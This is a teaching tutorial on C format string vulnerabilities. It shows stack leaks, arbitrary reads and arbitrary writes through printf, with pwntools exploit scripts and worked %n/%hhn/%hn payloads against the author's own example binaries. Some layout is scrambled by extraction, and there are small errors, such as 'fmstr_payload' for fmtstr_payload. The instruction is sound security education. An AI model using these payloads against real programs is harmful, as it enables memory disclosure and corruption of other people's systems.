Definition
Normal usage
A format string is a special string that contains ordinary characters (printed normally), and conversion specifications, used to display certain types of data by converting them.
It is used in functions such as printf(), fprintf(), in the first parameter.
Example:
printf("I have %d apples.\n", 10);
// output:
// I have 10 apples.
The string "I have %d apples" is a format string.
%d is a conversion specification.
d is a conversion specifier.
Each specifier asks for the next argument in the function.
So in this case, %d will try to convert the next argument after the format string, which is 10, into a signed decimal notation.
More specifiers are described in the manual man 3 printf.
Let's try to print out the same value with different specifiers :
int val = 10;
printf("Decimal: %d\nFloat: %f\nHex: 0x%x", val, (double) val, val);
Output:
Decimal: 10
Float: 10.000000
Hex: 0xa
Let's try to print it in hexadecimal format 3 times.
int val = 10;
printf("%x %x %x", val, val, val);
We get :
a a a
But what happens if you have more specifiers than arguments ?
Like :
int val = 10;
printf("%x %x %x", val);
We get something like this :
a f7c1ca2f 565561a4
What happened ?
As said earlier, each conversion specifier will expect an argument, so if we have 3 conversion specifiers,
we need 3 arguments after the format string.
In a 32-bit architecture, arguments in a function are placed on the stack. So the printf function retrieves each argument
on the stack, and if there are not enough, it just grabs the next value on the stack and uses it.
So on the previous example, the stack right before the call to printf looked like this :
pwndbg> stack
00:0000│ esp 0xffffd1a0 ◂— 0x0
01:0004│ 0xffffd1a4 ◂— 0xa /* '\n' */
02:0008│ 0xffffd1a8 —▸ 0xf7c1ca2f ◂— '_dl_audit_preinit'
03:000c│ 0xffffd1ac —▸ 0x565561a4 (replace_me) ◂— 0x2
04:0010│ 0xffffd1b0 —▸ 0xffffd1f0
We can recognize the 0xa (10 in hexadecimal) on the offset 1 on the stack, then f7c1ca2f, then 565561a4.
Exploit: read
Leaking the stack
Let's play with a simple example in C :
#include <stdio.h>
int main(int argc, char **argv)
{
int secret = 0xdead;
int secret2 = 0xbeef;
printf(argv[1], 10);
return 0;
}
Compile it with :
gcc main.c -o main -m32
And test it :
./main %p.%p.%p.%p.%p.%p
0xa.0xf7c1ca2f.0x565561a4.0xffffd1f0.0xf7fc1678.0xbeef.0xdead
1 |2 |3 |4 |5 |6 |7
You can see the variables secret and secret2 leaked in the output, because they are stored on the stack.
If you open it in gdb, and put a breakpoint right before the call to printf(), you'd see this :
pwndbg> stack 20
00:0000│ esp 0xffffd1a0 ◂— 0x0
01:0004│ 0xffffd1a4 ◂— 0xa /* '\n' */
02:0008│ 0xffffd1a8 —▸ 0xf7c1ca2f ◂— '_dl_audit_preinit'
03:000c│ 0xffffd1ac —▸ 0x565561a4 (main+23) ◂— 0x2e5005
04:0010│ 0xffffd1b0 —▸ 0xffffd1f0 —▸ 0xf7e1cff4 (_GLOBAL_OFFSET_TABLE_) ◂— 0x21cd8c
05:0014│ 0xffffd1b4 —▸ 0xf7fc1678 —▸ 0xf7ffdbac —▸ 0xf7fc1790 —▸ 0xf7ffda40 ◂— ...
06:0018│ 0xffffd1b8 ◂— 0xbeef
07:001c│ 0xffffd1bc ◂— 0xdead
08:0020│ 0xffffd1c0 —▸ 0xffffd1e0 ◂— 0x1
09:0024│ 0xffffd1c4 —▸ 0xf7e1cff4 (_GLOBAL_OFFSET_TABLE_) ◂— 0x21cd8c
0a:0028│ ebp 0xffffd1c8 ◂— 0x0
0b:002c│ 0xffffd1cc —▸ 0xf7c23295 (__libc_start_call_main+117) ◂— add esp, 0x10
So when we print 6 %p, we effectively print the 6 next elements that are stored on the stack.
Choosing an offset
Format string syntax allows to set an offset.
Since we know our value of interest is the 6th element of the stack, we can just print it with %6$p.
./main $(echo '%6$p')
0xbeef
We use $(echo ...) to avoid the variable expansion of our $ character by the shell.
But you can also use the escape character \, which would look like :
./main %6\$p
0xbeef
Arbitrary read
Leaking values off the stack is nice, but what if we want to leak one specific value at a given address ?
It is possible, with the help of the %s specifier !
A string is just a pointer to an array of character.
The %s specifier will dereference the pointer, and print the array of characters at that address.
Combined with an offset, we can point %<offset>$s to a value on the stack, so that it prints its content.
Let's see an example in C:
// gcc main.c -o main -m32
#include <stdio.h>
int main(int argc, char **argv)
{
char *secret = "mysecret";
printf("secret is at %p\n", secret);
char buffer[30];
fgets(buffer, sizeof(buffer), stdin);
printf(buffer);
return 0;
}
So in this code, the content of the variable secret is not printed, only its address is displayed.
Notice the usage of a secure fgets() instead of the insecure gets(), which reads user input until size - 1 (so 29 bytes here).
Our goal will be to use the address of the variable to print the content.
When running this program, we have :
./main
secret is at 0x56557008
And it waits for our input.
Let's first see where our input is located on the stack when printf is executed.
└─$ ./main
secret is at 0x56557008
%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
0x1e.0xf7e1d620.0x565561b4.0xf7fc7550.(nil).0xf7c1ca2f.0x7025d048.0x2e70252e.0x252e7025.0x70252e70
1 |2 |3 |4 |5 |6 |7 ^
Use python3 repl to generate a string like that quickly, and check its length.
$ python3
>>> "%p." * 10
'%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.'
>>> len("%p." * 10)
30
As we can see in the output, our format string is stored at offset 7 of the stack.
0x7025 is p% in little-endian, so %p.
python3
>>> bytearray.fromhex("7025")
bytearray(b'p%')
But it's cut in half, our string does not start exactly at offset 7, there's a d048 before.
So we can pad our string to make it start exactly at an offset.
Let's prepend aa to our string.
└─$ ./main
secret is at 0x56557008
aa%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
aa0x1e.0xf7e1d620.0x565561b4.0xf7fc7550.(nil).0xf7c1ca2f.0x6161d048.0x252e7025.0x70252e70.
1 |2 |3 |4 |5 |6 |7 a a |8 ^
Now, our format string %p.%p... starts exactly at offset 8 on the stack.
So we can just put the address we want to leak at that place, then point the %s specifier to that value.
Can you guess how the payload will look like ?
Elements to re-order: [address][specifier][padding]
Answer
Final Exploit
from pwn import *
target = './main'
elf = context.binary = ELF(target)
payload = b'aa' # padding
payload += p32(0x56557008) # address of var `secret`
payload += b'%8$s' # string specifier
p = process()
print(p.clean())
p.sendline(payload)
print(p.clean())
└─$ python3 exploit.py
[*] '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_read/main'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_read/main': pid 27765
b'secret is at 0x56557008\n'
[*] Process '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_read/main' stopped with exit code 0 (pid 27765)
b'aa\x08pUVmysecret\n'
Now go practice with the easy exercises for format string.
Exploit: write
We learned that with a user-controlled format string, we can read anywhere.
But we can also write anywhere ! Thanks to the specifier %n:
%n: The number of characters written so far is stored into the integer pointed to by the corresponding argument.
Source: man 3 printf
int len = 0;
printf("hello %n", &len);
What is the value of len ?
Answer
hello = 5 bytes
space = 1 byte
Right before the call to printf, the stack looked like this:
pwndbg> stack 20
00:0000│ esp 0xffffd1a0 ◂— 0x0
01:0004│ 0xffffd1a4 ◂— 0x56556123 (len) ◂— 0x0
...
The address of the variable len is on the first offset on the stack, and %n replaces the value pointed by 0x56556123 (len).
Example
Let's try with an example:
// gcc main.c -m32 -o main -no-pie
#include <stdio.h>
int replace_me = 0;
void main()
{
char buffer[30];
fgets(buffer, sizeof(buffer), stdin);
printf(buffer);
if (replace_me == 10)
{
puts("You win !");
}
else if (replace_me != 0)
{
puts("You're close, keep trying...");
}
}
The goal is to overwrite the value of the variable replace_me with 10.
No buffer overflow allowed here, since we're using the secure fgets.
Find address
First, let's try to find the address of the variable we want to replace.
Since replace_me is a global variable (and it was compiled with -no-pie), we can just retrieve its address using readelf binary.
└─$ readelf -s main | grep "replace_me"
25: 0804c01c 4 OBJECT GLOBAL DEFAULT 24 replace_me
So replace_me's address is 0x804c01c.
Find stack offset
Next, we need to find where our payload will end up on the stack.
└─$ ./main
%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
0x1e.0xf7e1d620.0x804918d.0x702514a0.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70
1 |2 |3 |4 ^
Seems like it's on the 4th element of the stack, but it's cut in half again by some random bytes.
So we can just add some padding to have our string located exactly at offset 5.
└─$ ./main
aa%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
aa0x1e.0xf7e1d620.0x804918d.0x616114a0.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.
1 |2 |3 |4 a a |5 ^
Now we can build our payload. We want the stack to be looking like this:
└─$ ./main
aa%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
aa0x1e.0xf7e1d620.0x804918d.0x616114a0.0x1cc00408....
1 |2 |3 |4 a a |5 address of replace_me
Write exploit
from pwn import *
target = './main'
elf = context.binary = ELF(target)
REPLACE_ME = 0x0804c01c
p = process()
payload = b'aa' # padding, 2 bytes
payload += p32(REPLACE_ME) # address of variable replace_me, 4 bytes
payload += b'a' * 4 # 6 bytes written already, need to add 4 to make 10
payload += b'%5$n' # write 10 to address that is on offset 5 of the stack
print(p.clean())
p.sendline(payload)
print(p.clean())
└─$ python3 exploit.py
[*] '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_write/main'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Starting local process '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_write/main': pid 29583
14
b''
[*] Process '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_write/main' stopped with exit code 10 (pid 29583)
b'aa\x1c\xc0\x04\x08aaaa\nYou win !\n'
You can also use these specifiers to write characters:
%<length>d%<length>c
In our previous exploit, it would look like :
payload = b'aa'
payload += p32(REPLACE_ME)
payload += b'%4d%5$n' # or b'%4c%5$n'
Automate with pwntools
Pwntools has a feature for automating %n format string exploits:
payload = fmstr_payload(offset, {location: value}, numbwritten)
- offset is the offset we find on the stack
- location is the address where we want to write
- value is the value we want to write at location
- numbwritten (optional) is the number of already written bytes
The dictionary can contain more values if needed, in case we need to write at multiple addresses.
Check https://docs.pwntools.com/en/stable/fmtstr.html#pwnlib.fmtstr.FmtStr for more details.
For our example, the payload would look like :
payload = b'aa'
payload += fmtstr_payload(5, {REPLACE_ME: 10}, 2)
- 5 is offset on the stack
- 2 is to match
b'aa'that were already written
Multi-byte write
What if we want to write a very large number ? Like 0xbabeface, at address 0xffffaaaa ?
We can't just write everything in one int, since the maximum value of an int is 2 147 483 647,
and 0xbabeface in decimal is 3,133,078,222.
It will just overflow the int.
So we need to split the write in multiple bytes. We can either:
- write in byte by byte (little-endian, so reverse order):You can use
0xffffaaaa: 0xce
0xffffaaab: 0xfa
0xffffaaac: 0xbe
0xffffaaad: 0xba%hhnto write byte by byte
- write in 2 shorts (2 bytes + 2 bytes)You can use
0xffffaaaa: 0xface
0xffffaaac: 0xbabe%hnto write shorts
How would the payload look like if we wanted
to overwrite the value at address 0xffffaaaa with value 0xbabeface, and :
- using bytes write (
%hhn) - payload starts at offset 5
Hint 1
[1st writing][offset specifier][2nd writing][offset specifier] [3rd writing][offset specifier][4th writing][offset specifier] [1st address][2nd address][3rd address][4th address]Hint 2
0xba, then add the others in ascending order. (smallest to largest)Hint 3
Answer
%186c%16$hhn%4c%17$hhn%16c%18$hhn%44c%19$hhn\xad\xaa\xff\xff\xac\xaa\xff\xff\xaa\xaa\xff\xff\xab\xaa\xff\xff
%186c: we first writebabecause it's the smallest byte%16$hhn: we write on the address at offset 16, which should be0xffffaaad(offset determined at the end)%4c: next byte to print isbe, and we already printed 186 chars, so we need0xbe - 0xba = 4to printba%17$hhn: we write on the address at offset 17, which should be0xffffaaac%16c: next byte to print isce, and we already printed 190 chars, so we need0xce - 0xbe = 16to printce%18$hhn: we write on the address at offset 18, which should be0xffffaaaa%44c: next byte to print isfa, and we already printed 206 chars, so we need0xfa - 0xce = 44to printfa%19$hhn: we write on the address at offset 19, which should be0xffffaaab\xad\xaa\xff\xff:0xffffaaadpacked in little-endian\xac\xaa\xff\xff:0xffffaaacpacked in little-endian\xaa\xaa\xff\xff:0xffffaaaapacked in little-endian\xab\xaa\xff\xff:0xffffaaabpacked in little-endian
To calculate the offsets, you need to craft the whole payload first.
%186c%$hhn%4c%$hhn%16c%$hhn%44c%$hhn
Then you calculate the total length of the payload:
>>> len('%186c%$hhn%4c%$hhn%16c%$hhn%44c%$hhn')
36
36 / 4 = 9, so this payload without offsets will take 9 slots on the stack.
We know that our offsets will be superior than 5 + 9 = 14, so each offset will take 2 bytes.
We have 4 offsets to place, so 4 * 2 = 8 bytes.
The total length of our payload will be 36 + 8 = 44 bytes, and it's a multiple of 4 bytes so no need
to pad to align the addresses (they will start exactly at a certain offset).
44 / 4 = 11, so our first address will start at offset 5 + 11 = 16.
How would the payload look like if we wanted
to overwrite the value at address 0xffffaaaa with value 0xbabeface, and :
- using shorts write (
%hn) - payload starts at offset 5
Hint 1
[1st writing][offset specifier][2nd writing][offset specifier][1st address][2nd address]Hint 2
0xbabe.Hint 3
Answer
%47806c%12$hn%16400c%13$hnaa\xac\xaa\xff\xff\xaa\xaa\xff\xff
%47806c: we first writebabebecause it's smaller thanface(can't do it the other way)%12$hn: we write on the address at offset 12, which should be0xffffaaac%16400c: we already printed 47806 chars, so we need0xface - 0xbabe = 16400more to printface%13hn: we write on the address at offset 13, which should be0xffffaaaaaa: padding to add, so that total length is aligned to 4 bytes (multiple of 4)\xac\xaa\xff\xff:0xffffaaacpacked in little-endian\xaa\xaa\xff\xff:0xffffaaaapacked in little-endian
The offsets are 12 and 13, because the string %47806c%11$hn%16400c%12$hnaa contains 28 bytes.
28 / 4 = 7 elements on the stack.
Since our payload starts at offset 5, 5 + 7 = 12, so our addresses will start on the stack
at offset 12, then 13.